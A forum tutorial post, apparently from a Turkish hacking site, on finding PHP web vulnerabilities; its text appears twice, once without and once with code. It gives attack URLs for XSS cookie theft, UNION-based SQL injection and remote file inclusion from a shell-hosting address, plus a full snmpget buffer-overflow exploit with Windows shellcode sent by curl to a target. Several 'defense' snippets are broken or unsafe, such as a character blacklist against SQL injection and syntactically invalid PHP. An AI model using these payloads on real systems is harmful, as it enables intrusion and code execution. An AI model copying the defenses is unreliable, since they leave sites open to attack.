- 21 Eki 2015
- 477
- 1
Find Bug on PhP System
Introduction
We will deal with vulnerabilities in PHP systems through functions and variables.
The reason we classify it because most of our friends have difficulty finding and defining it in PHP systems.
This d0cument will help you find and identify the bug.
Phase 1
In PHP systems, you should first look at he following variables in the source code:
Why? Answer is:
These variables that exist in PHP systems are Input Table variables.
For example, if the form field where we entered our password on the admin login page is assigned to the value with the variable $_POST, the job we will do is to examine this variable field.
Because uncontrolled inputs create weakness in the system.
Now were going to go through them one by one.
__________________________________________________ _____________
Cross Site Scripting Vulnerability (XSS)
XSS is a user-oriented vulnerability.
On browsers; the attack is done against the user with javascript codes that are infected with web pages.
Nowadays, website owners are ignorant of this vulnerability and all browsers javascript support is sufficient to understand that XSS vulnerabilities are very common.
So how does it happen?
It is basically result of the abuse of HTML tags.
Example:
Variables arent subject to any filters.
Sample attack module:
Defense
It is necessary to prevent abuse of HTML tags.
Therefore we need to use the htmlspecialchars function:
__________________________________________________ _____________
SQL Injection Vulnerability
SQL Injection is a server-oriented vulnerability unlike XSS vulnerabilities.
SQL Injection vulnerabilities are caused by filter user inputs.
You will ask, what is the difference in XSS due to lack of filters? Answer is:
SQL Injection: It is caused by not filtering the fields where we exchange data with the database.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
It occurs in the form of.
Example:
The id variables isnt subject to any filtering. If we put a quotation from the top, the database will fail!
Sample attack module:
Defense
Here we will ban the terms +(plus) ;(semicolon) used in SQL Injection.
We used the array above to enclose the forbidden terms into an array and redefine the id value according to these terms.
__________________________________________________ _____________
Dynamic Evaluation Vulnerability
It is a deficit type that occurs with the misuse of PHP functions.
Example:
Note how the above function is called.
Sample Attack Module:
And you will see that phpinfo information comes to our page.
Defense
These deficits are caused by novice coders who dont know about PHP bugs.
Never call a function in this way.
You may face big problems, so when calling functions:
It can be used in the form of.
__________________________________________________ _____________
Register Globals Vulnerability
Register global is a very dangerous and sometimes useful PHP supplement.
How does it work?
As you know, we use the terms $_POST and $_GET in our PHP applications when calling variables.
Register global provides a benefit when it is open and assign the input name directly as a variable without having to use $_POST or $_GET and it allows you to write less code.
However, use this only when you trust your PHP applications. Why?
Because we can shape the input assigned to the variables as you wish. Register global is off after PHP 4.1.
Example:
In the example above, the isset is a function that checks whether the variable exists.
How do we attack? Since the variable is assigned directly to the input, we can determine its value.
Sample Attack Module:
And the admin panel will open. So how do we close this deficit?
Defense:
Keep the Register Globals function off at all the times.
Or using your own initiative:
Add this variable:
Example:
When Register Global is on, we can shape the input. Therefore, so many types of deficits can occur.
Lets shape the current input above with include.
Sample Attack Module:
__________________________________________________ _____________
File Upload Vulnerability
Shell upload vulnerabilities are caused by not being able to filter file types fully in PHP systems.
We can upload our own php codes to an application that only uploads files with graphic extensions.
Example:
The expression !=image/gif above sys that the file type is gif only.
However, the file extension isnt checked. File type and extension are very different terms.
So how do we exploit it? Answer: we send our PHP file in gif type.
To the first line of our PHP file:
We need to enter the code GIF89A in all capital letters. It isnt acceptable in small letters.
And you will see that PHP file has been uploaded.
Defense
We can pu a filter barrier by banning file extensions.
We can block extensions like that. At the same time we can put a forbidden barrier in /upload folder:
(You can do this by using the ignore* or deny all# commands using .htaccess file.)
Most importantly, we can provide random name to upload files.
This way, even if php files are uploaded, it wont be able to view the file because the folder is forbidden and the name is random.
__________________________________________________ _____________
Xpath Injection(XML FUNCTIONS) Vulnerability
Xpath Injection is another type of injection that is very similar to SQL Injection.
In SQL, Injection is done to SQL database but in Xpath injection is done to XML files.
To detect vulnerability, you must first determine the input fields that send Xpath queries.
Example:
Note that we send an Xpath query to kasva.xml in line 4 above.
Now lets look at this xml file:
Note the tags in the XML file.
Yes, lets send queries according to our php file:
Yes, all the objects in the Xml file are here.
__________________________________________________ _____________
Hidden Form Manipulation Vulnerability
This type of deficit can occur on every web page that uses fields for user data migration.
We can inject code by manipulating Hidden form fields. How can this happen?
Many web programmers use hidden forms to block code injection when encoding these fields. They filter from characters like > <.
However, this filter should be before the data is passed to the hidden form. Therefore:
DATA HIDDEN FORM FILTER > This usage creates security vulnerability.
DATA FILTER HIDDEN FORM > Safe to use.
So what kind of pages are these deficits found on? For example, in multi-pass admin pages, the admin name switches to hidden forms.
User Login HIDDEN FORM Admin Login HIDDEN FORM Administrator
Example:
Lets look at a sample usage:
What happens if we enter > kasva code instead of username in the form above? Lets look:
Yes, as you can see, we now have an empty value. Note that the code we entered above (> kasva) is completed even though we dont put a concealer tag(>) at the end.
And now, lets inject our Xss code:
Lets see:
And cookie will hit the browser.
Defense
Do not transfer unfiltered data to hidden forms!
__________________________________________________ _____________
Backup Files Download Vulnerability
It is an annoying deficit even it doesnt seem much.
Novice Web programmers call it random when storing backup files.
Example:
In the second line of the above code, the rand() function gives a random number between 1 and 100 and in the third line, it is assigned to these backup files with $rnd_backup_.sql.
With Bruteforce you can easily get the backup file name.
Even though its an underrated deficit, it finds a place in important scripts:
Look=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable
__________________________________________________ _____________
File Management Vulnerability
There are many functions for file management in PHP.
If you are a lazy programmer, you dont control the inputs that you will process on your files.
When this happens, 2nd parties can access your files remotely.
Example:
Attacker can remotely read etc/passwd on the server by assigning the following code /etc/passwd/ to the $newfile variable.
Some other functions:
Defense
You can filter by your file types. This is a problem entirely up to coders.
__________________________________________________ _____________
Buffer Overflows Vulnerability
Although it is very common in web applications, it is a deficit that is difficult to use.
This is mainly due to the inability of Web applications to check the limit of user-supplied data before storing it.
Sow how can we use it professionally?
We can search MAXLENGTH tags int he input fields or we can manipulate javascript code in the html source.
It is basically based on these 2 methods but it will take a lot of time to do them manually.
So how can we do it? We will need a tool that can send random strings to these inputs.
And we can tell whether the attacks we made with the received HTTP Status Codes were successful.
Buffer Overflow is a professional tool that used in penetration testing:
firefuzzer - A Penetration Testing tool intended to find vulnerabilities in Web Pages especially Buffer Overflow and XSS - Google Project Hosting
With this tool, you can detect and exploit buffer overflow attacks that exist especially on login pages.
Example:
Buffer Overflow occurs when the php programmer uses some dangerous functions:
For example, snmpget() is a Buffer Overflow Vulnerability
Before checking user-supplied information with $_GET, the limit check fails in php, resulting in Buffer Overflow.
The attacker can execute arbitrary code by exploiting it.
Exploit:
Defense
Keep your PHP version up to date!
__________________________________________________ _____________
Denial of Service Vulnerability
It is difficult for Web applications to understand that a user is attacking or sending a normal request.
They can use the IP address for this, but determining the exact ******** of someone with the IP address goes beyond a web application.
What does this have to do with Dos? If you send a continuous request from a computer to a server, youll know.
I will try to show you the most common type of DOS attack type encountered:
Example:
Above, Mysql writes a separate data for each request. Applications like this can write browser of other junk user information into the database.
Attacker can exploit this to attack MySQL in a very simple way.
This isnt just limited to Mysql:
Bandwidth, database connections, disk storage, CPU, memory, threads, application records...
Defense
Make sure it is practical and useful when using Web applications!
__________________________________________________ _____________
Default Unnecessary Installation Files
Sometimes we use install scripts when installing web applications. Sometimes if these scripts arent deleted after installation or if an extra install file is created, security would be compromised.
Someone accessing this file can obtain authorization by re-installing the web application.
For example, the install file that isnt deleted in VBulletin.
Defense
Clean these files after installing your applications.
__________________________________________________ _____________
Turkish Version: https://www.turkhackteam.org/web-server-guvenligi/994636-find-bug-php-system.html
Introduction
We will deal with vulnerabilities in PHP systems through functions and variables.
The reason we classify it because most of our friends have difficulty finding and defining it in PHP systems.
This d0cument will help you find and identify the bug.
Phase 1
In PHP systems, you should first look at he following variables in the source code:
Kod:
$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS
Why? Answer is:
These variables that exist in PHP systems are Input Table variables.
For example, if the form field where we entered our password on the admin login page is assigned to the value with the variable $_POST, the job we will do is to examine this variable field.
Because uncontrolled inputs create weakness in the system.
Now were going to go through them one by one.
__________________________________________________ _____________
Cross Site Scripting Vulnerability (XSS)
XSS is a user-oriented vulnerability.
On browsers; the attack is done against the user with javascript codes that are infected with web pages.
Nowadays, website owners are ignorant of this vulnerability and all browsers javascript support is sufficient to understand that XSS vulnerabilities are very common.
So how does it happen?
It is basically result of the abuse of HTML tags.
Example:
Kod:
<?php
$xss = $_GET[alco];
print $xss ;
?>
Variables arent subject to any filters.
Sample attack module:
Kod:
#http://127.0.0.1:80/index.php?alco="><scr ipt>alert(********.cookie);</script>
Defense
It is necessary to prevent abuse of HTML tags.
Therefore we need to use the htmlspecialchars function:
Kod:
<?php
$xss = $_GET[alco];
print htmlspecialchars($xss) ;
?>
__________________________________________________ _____________
SQL Injection Vulnerability
SQL Injection is a server-oriented vulnerability unlike XSS vulnerabilities.
SQL Injection vulnerabilities are caused by filter user inputs.
You will ask, what is the difference in XSS due to lack of filters? Answer is:
SQL Injection: It is caused by not filtering the fields where we exchange data with the database.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
It occurs in the form of.
Example:
Kod:
<?php
$id= $_GET[id];
....
$query= "SELECT * FROM users WHERE id= .$id." ;"
...
?>
The id variables isnt subject to any filtering. If we put a quotation from the top, the database will fail!
Sample attack module:
Kod:
#http://127.0.0.1:80/index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*
Defense
Here we will ban the terms +(plus) ;(semicolon) used in SQL Injection.
Kod:
<?php
$id= $_GET[id];
....
$yasak = array("\\\\\\\\"", "\\\\\\\\\\\\\\\\", "/", "*", "", "=", "-
", "#", ";", "<", ">", "+", "%");
$id = str_replace($yasak, "", $id);
$query= "SELECT * FROM users WHERE id= .$id." ;"
...
?>
We used the array above to enclose the forbidden terms into an array and redefine the id value according to these terms.
__________________________________________________ _____________
Dynamic Evaluation Vulnerability
It is a deficit type that occurs with the misuse of PHP functions.
Example:
Kod:
<?php
$fonksiyon = $_GET[fonksiyon];
$fonksiyon();
?>
Note how the above function is called.
Sample Attack Module:
Kod:
#http://127.0.0.1:80/index.php?fonksiyon=phpinfo
And you will see that phpinfo information comes to our page.
Defense
These deficits are caused by novice coders who dont know about PHP bugs.
Never call a function in this way.
You may face big problems, so when calling functions:
Kod:
<?php
function fonksiyon()
{
$fonksiyon = $_GET(fonksiyon)
print $fonksiyon ;
}
?>
It can be used in the form of.
__________________________________________________ _____________
Register Globals Vulnerability
Register global is a very dangerous and sometimes useful PHP supplement.
How does it work?
As you know, we use the terms $_POST and $_GET in our PHP applications when calling variables.
Register global provides a benefit when it is open and assign the input name directly as a variable without having to use $_POST or $_GET and it allows you to write less code.
However, use this only when you trust your PHP applications. Why?
Because we can shape the input assigned to the variables as you wish. Register global is off after PHP 4.1.
Example:
Kod:
<?php
if (isset($admin)) {
//Admin Paneline Hoş Geldiniz!
[...]
} else {
//Yanlış giriş yaptınız!
[...]
}
?>
How do we attack? Since the variable is assigned directly to the input, we can determine its value.
Sample Attack Module:
Kod:
#http://127.0.0.1:80/admin.php?admin=1
And the admin panel will open. So how do we close this deficit?
Defense:
Keep the Register Globals function off at all the times.
Or using your own initiative:
Kod:
$is_admin =();
Add this variable:
Kod:
<?php
$is_admin =()
if (isset($is_admin)) {
//Admin Paneline Hoş Geldiniz!
[...]
} else {
//Yanlış giriş yaptınız!
[...]
}
?>
Example:
When Register Global is on, we can shape the input. Therefore, so many types of deficits can occur.
Kod:
<?php
include "$path/kasva.php";
?>
Lets shape the current input above with include.
Sample Attack Module:
Kod:
#http://127.0.0.1:80/index.php?path=http://shelliniz.org/?
__________________________________________________ _____________
File Upload Vulnerability
Shell upload vulnerabilities are caused by not being able to filter file types fully in PHP systems.
We can upload our own php codes to an application that only uploads files with graphic extensions.
Example:
Kod:
<?php
....
if($_FILES[userfile][type] != "image/gif") {
....
}
?>
The expression !=image/gif above sys that the file type is gif only.
However, the file extension isnt checked. File type and extension are very different terms.
So how do we exploit it? Answer: we send our PHP file in gif type.
To the first line of our PHP file:
We need to enter the code GIF89A in all capital letters. It isnt acceptable in small letters.
And you will see that PHP file has been uploaded.
Defense
We can pu a filter barrier by banning file extensions.
Kod:
$yasak = array(".php", ".phtml", ".php3", ".php4");
We can block extensions like that. At the same time we can put a forbidden barrier in /upload folder:
(You can do this by using the ignore* or deny all# commands using .htaccess file.)
Most importantly, we can provide random name to upload files.
This way, even if php files are uploaded, it wont be able to view the file because the folder is forbidden and the name is random.
__________________________________________________ _____________
Xpath Injection(XML FUNCTIONS) Vulnerability
Xpath Injection is another type of injection that is very similar to SQL Injection.
In SQL, Injection is done to SQL database but in Xpath injection is done to XML files.
To detect vulnerability, you must first determine the input fields that send Xpath queries.
Example:
Kod:
<?php
$test = $_GET[test];
if ($test){
$xml = simplexml_load_file("kasva.xml");
$result = $xml->xpath($test);
print_r($result);
}
?>
Note that we send an Xpath query to kasva.xml in line 4 above.
Now lets look at this xml file:
Kod:
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>kayra</to>
<from>kasva</from>
<heading>Mektup</heading>
<bOdy>Seni seviyorum kayra!</bOdy>
</note>
Note the tags in the XML file.
Yes, lets send queries according to our php file:
Kod:
Index.php?test=from:
#Array ( [0] => SimpleXMLElement Object ( [0] => kasva ) )
Index.php?test=*
#Array ( [0] => SimpleXMLElement Object ( [0] => kayra ) [1] => SimpleXMLElement Object ( [0] => kasva
) [2] => SimpleXMLElement Object ( [0] => Reminder ) [3] => SimpleXMLElement Object ( [0] => Seni seviyorum kayra! ) )
__________________________________________________ _____________
Hidden Form Manipulation Vulnerability
This type of deficit can occur on every web page that uses fields for user data migration.
We can inject code by manipulating Hidden form fields. How can this happen?
Many web programmers use hidden forms to block code injection when encoding these fields. They filter from characters like > <.
However, this filter should be before the data is passed to the hidden form. Therefore:
DATA HIDDEN FORM FILTER > This usage creates security vulnerability.
DATA FILTER HIDDEN FORM > Safe to use.
So what kind of pages are these deficits found on? For example, in multi-pass admin pages, the admin name switches to hidden forms.
User Login HIDDEN FORM Admin Login HIDDEN FORM Administrator
Example:
Lets look at a sample usage:
Kod:
<form>
<input type="hidden" name="username" value="kasva" >
</form>
What happens if we enter > kasva code instead of username in the form above? Lets look:
Kod:
<form>
<input type="hidden" name="username" value="" >
kasva">
</form>
Yes, as you can see, we now have an empty value. Note that the code we entered above (> kasva) is completed even though we dont put a concealer tag(>) at the end.
And now, lets inject our Xss code:
Lets see:
Kod:
<form>
<input type="hidden" name="username" value="">
<scr ipt>alert(********.cookie)</script>
<a name ="">
</form>
And cookie will hit the browser.
Defense
Do not transfer unfiltered data to hidden forms!
__________________________________________________ _____________
Backup Files Download Vulnerability
It is an annoying deficit even it doesnt seem much.
Novice Web programmers call it random when storing backup files.
Example:
Kod:
<?php
$rnd = rand(1,100);
$fp = fopen($rnd._backup_.sql, w);
fwrite($fp, $db );
fclose($fp);
?>
In the second line of the above code, the rand() function gives a random number between 1 and 100 and in the third line, it is assigned to these backup files with $rnd_backup_.sql.
With Bruteforce you can easily get the backup file name.
Even though its an underrated deficit, it finds a place in important scripts:
Look=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable
__________________________________________________ _____________
File Management Vulnerability
There are many functions for file management in PHP.
If you are a lazy programmer, you dont control the inputs that you will process on your files.
When this happens, 2nd parties can access your files remotely.
Example:
Kod:
<?php
$file = $_GET[cpFile];
$newfile = "/user/local/www/html/tmp/file.php";
if (!copy($file, $newfile)) {
echo "Üzgünüm kopyalanamadı: $file...\\\\\\\\\\\\\\\\n";
} else {
echo " Kopyalama başarılı .."
}
?>
Attacker can remotely read etc/passwd on the server by assigning the following code /etc/passwd/ to the $newfile variable.
Some other functions:
Kod:
Rmdir
unlink
delete
fwrite
Defense
You can filter by your file types. This is a problem entirely up to coders.
__________________________________________________ _____________
Buffer Overflows Vulnerability
Although it is very common in web applications, it is a deficit that is difficult to use.
This is mainly due to the inability of Web applications to check the limit of user-supplied data before storing it.
Sow how can we use it professionally?
We can search MAXLENGTH tags int he input fields or we can manipulate javascript code in the html source.
It is basically based on these 2 methods but it will take a lot of time to do them manually.
So how can we do it? We will need a tool that can send random strings to these inputs.
And we can tell whether the attacks we made with the received HTTP Status Codes were successful.
Buffer Overflow is a professional tool that used in penetration testing:
firefuzzer - A Penetration Testing tool intended to find vulnerabilities in Web Pages especially Buffer Overflow and XSS - Google Project Hosting
With this tool, you can detect and exploit buffer overflow attacks that exist especially on login pages.
Example:
Buffer Overflow occurs when the php programmer uses some dangerous functions:
Kod:
confirm_phpdoc_compiled
mssql_pconnect
mssql_connect
crack_opendict
snmpget
ibase_connect
For example, snmpget() is a Buffer Overflow Vulnerability
Kod:
<?php
$host = $_GET[host];
$timeout = $_GET[timeout];
$syscontact = snmpget("$host", "$timeout");
?>
Before checking user-supplied information with $_GET, the limit check fails in php, resulting in Buffer Overflow.
The attacker can execute arbitrary code by exploiting it.
Exploit:
Kod:
<?php
if (!extension_loaded("snmp")){
die("snmp ekini yüklemelisiniz");
} $____scode=
"\\xeb\\x1b".
"\\x5b".
"\\x31\\xc0".
"\\x50".
"\\x31\\xc0".
"\\x88\\x43\\x59".
"\\x53".
"\\xbb\\x6d\\x13\\x86\\x7c". //WinExec komutu
"\\xff\\xd3".
"\\x31\\xc0".
"\\x50".
"\\xbb\\xda\\xcd\\x81\\x7c".
"\\xff\\xd3".
"\\xe8\\xe0\\xff\\xff\\xff".
"\\x63\\x6d\\x64".
"\\x2e".
"\\x65".
"\\x78\\x65".
"\\x20\\x2f".
"\\x63\\x20".
"start notepad & ";
$edx="\\x64\\x8f\\x9b\\x01"; //jmp scode
$eip="\\x73\\xdc\\x82\\x7c"; //0x7C82DC73 jmp edx
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("\\x
90",48).$____scode.str_repeat("\\x90",48);
Kod:
//You can write 256 buffer code.
$curl = curl_init();
//Send Time out
curl_setopt ($curl, CURLOPT_URL, "http://target.com/snmp.php?host=127.0.
0.1&timeout=$____suntzu");
curl_exec ($curl);
curl_close ($curl);
?>
Defense
Keep your PHP version up to date!
__________________________________________________ _____________
Denial of Service Vulnerability
It is difficult for Web applications to understand that a user is attacking or sending a normal request.
They can use the IP address for this, but determining the exact ******** of someone with the IP address goes beyond a web application.
What does this have to do with Dos? If you send a continuous request from a computer to a server, youll know.
I will try to show you the most common type of DOS attack type encountered:
Example:
Kod:
<?php
//....
$user_mode=$_SERVER[HTTP_USER_AGENT];
$user_ip=$_SERVER[SERVER_ADDR];
$sql = "INSERT INTO tbl_name (..) VALUES($user_mode,$user_ip);";
//Mysql her request için ayrı bir veri yazıyor.
//..
?>
Above, Mysql writes a separate data for each request. Applications like this can write browser of other junk user information into the database.
Attacker can exploit this to attack MySQL in a very simple way.
This isnt just limited to Mysql:
Bandwidth, database connections, disk storage, CPU, memory, threads, application records...
Defense
Make sure it is practical and useful when using Web applications!
__________________________________________________ _____________
Default Unnecessary Installation Files
Sometimes we use install scripts when installing web applications. Sometimes if these scripts arent deleted after installation or if an extra install file is created, security would be compromised.
Someone accessing this file can obtain authorization by re-installing the web application.
For example, the install file that isnt deleted in VBulletin.
Defense
Clean these files after installing your applications.
__________________________________________________ _____________
Turkish Version: https://www.turkhackteam.org/web-server-guvenligi/994636-find-bug-php-system.html